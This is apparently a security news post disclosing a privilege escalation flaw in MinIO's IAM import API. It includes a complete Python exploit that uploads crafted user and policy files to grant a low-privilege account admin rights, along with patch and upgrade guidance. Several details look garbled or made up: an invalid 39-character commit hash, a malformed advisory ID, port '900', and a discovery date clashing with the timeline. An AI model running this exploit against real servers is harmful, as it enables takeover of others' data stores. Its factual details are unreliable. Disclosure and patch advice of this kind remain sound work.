CVE CyberSecurity Database News

CVE-2024-55949 - Critical Privilege Escalation in MinIO IAM Import API – Full Disclosure, Exploit Example, and Update Guidance

Poster -

---
MinIO is a high-performance, S3-compatible object storage solution, popular in cloud-native deployments and widely used for on-premises and hybrid cloud architectures. Released under the GNU AGPLv3 license, MinIO is highly valued for its performance, flexibility, and open-source transparency.

However, in early June 2024, a major security vulnerability was discovered that affects all MinIO users who have deployed versions after a specific commit. This post details CVE-2024-55949, provides exploit details, code snippets, and all the information you need to understand, reproduce, and mitigate this critical issue.

What is CVE-2024-55949?

CVE-2024-55949 refers to a privilege escalation flaw in MinIO’s IAM (Identity and Access Management) import API. This vulnerability allows an attacker to escalate privileges, potentially gaining unauthorized access or control well beyond what they're supposed to have.

Who is affected?

- ALL MinIO users running builds after commit 580d9db85e04f1b63cc2909af50fed08afa965f.

Has it been fixed?

- Yes, patched in commit f246c9053f9603e610d98439799bdd2a6b293427 and included in release RELEASE.2024-12-13T22-19-12Z.

Exploit Details

The bug is in the IAM import API. This API allows administrators to import or update IAM users and policies.

How does the attack work?

Prior to the fix, the API did not properly enforce or check privileges when importing IAM configurations. Any authenticated user with access to the import endpoint could upload a crafted IAM configuration JSON file and give themselves or others any privileges, including root/admin.

Attacker uses the IAM import endpoint to overwrite existing IAM configuration.

Result: Attacker escalates to admin, full control of MinIO server.

Example Exploit Code

Here’s a basic Python 3 exploit using the requests library (for illustrative and educational purposes only – do not use maliciously!).

import requests

# MinIO endpoint and credentials (attacker’s own low-privilege creds)
minio_url = 'http://minio-server:900/minio/admin/v3/import';
access_key = 'attacker'
secret_key = 'theirpass'

# Craft a malicious users.json with escalated privileges
users_json = '''
{
  "attacker": {
    "policy": "admin",
    "status": "enabled",
    "secretKey": "theirpass"
  }
}
'''

# Dummy policies.json (not strictly required, but included for completeness)
policies_json = '''
{
  "admin": {
    "version": "2012-10-17",
    "statement": [
      {
        "effect": "allow",
        "action": ["*"],
        "resource": ["*"]
      }
    ]
  }
}
'''

files = {
    'users.json': ('users.json', users_json, 'application/json'),
    'policies.json': ('policies.json', policies_json, 'application/json'),
}

session = requests.Session()
session.auth = (access_key, secret_key)

response = session.post(minio_url, files=files)

if response.status_code == 200:
    print('[+] Successfully escalated privileges to admin!')
else:
    print('[-] Exploit failed:', response.text)

Run minio version.

- If you see a version between 580d9db and before f246c9053f9603e610d98439799bdd2a6b293427, you are vulnerable.
2. Look for use of the /minio/admin/v3/import API.

No Workarounds: Upgrade Now

There are NO effective, safe workarounds. Blocking the API endpoint is not practical (it is needed for normal operations and used by admin tools). Compromised IAM state is hard to detect post-attack.

Patch available!

- Go to the official MinIO releases page

Download and upgrade to RELEASE.2024-12-13T22-19-12Z or later.

# Simple upgrade steps (run as admin/sudo)
systemctl stop minio
wget https://dl.min.io/server/minio/release/linux-amd64/archive/minio.RELEASE.2024-12-13T22-19-12Z
cp minio.RELEASE.2024-12-13T22-19-12Z /usr/local/bin/minio
chmod +x /usr/local/bin/minio
systemctl start minio

*(Adjust download link as per your OS/arch. Back up your data first.)*

Original Commit introducing the bug:

580d9db85e04f1b63cc2909af50fed08afa965f

Patch Commit:

f246c9053f9603e610d98439799bdd2a6b293427

Security Advisory:

https://github.com/minio/minio/security/advisories/GHSA-1r24-qjvf-c2qg

Fixed Release:

RELEASE.2024-12-13T22-19-12Z

MinIO Official Site:

https://min.io

MinIO GitHub:

https://github.com/minio/minio

Conclusion

CVE-2024-55949 is a serious privilege escalation flaw in MinIO that is easily exploitable by anyone who can access the IAM import API as any user. All MinIO users are advised to upgrade immediately to ensure the safety of their data.

If you’re responsible for a MinIO deployment, drop everything and make sure you’re running a safe, patched release. This is not a drill – attackers will be looking for exposed or unpatched instances right now.

For questions or help, consult the official MinIO documentation or reach out to their community channels. Stay safe!

Timeline

Published on: 12/16/2024 20:15:13 UTC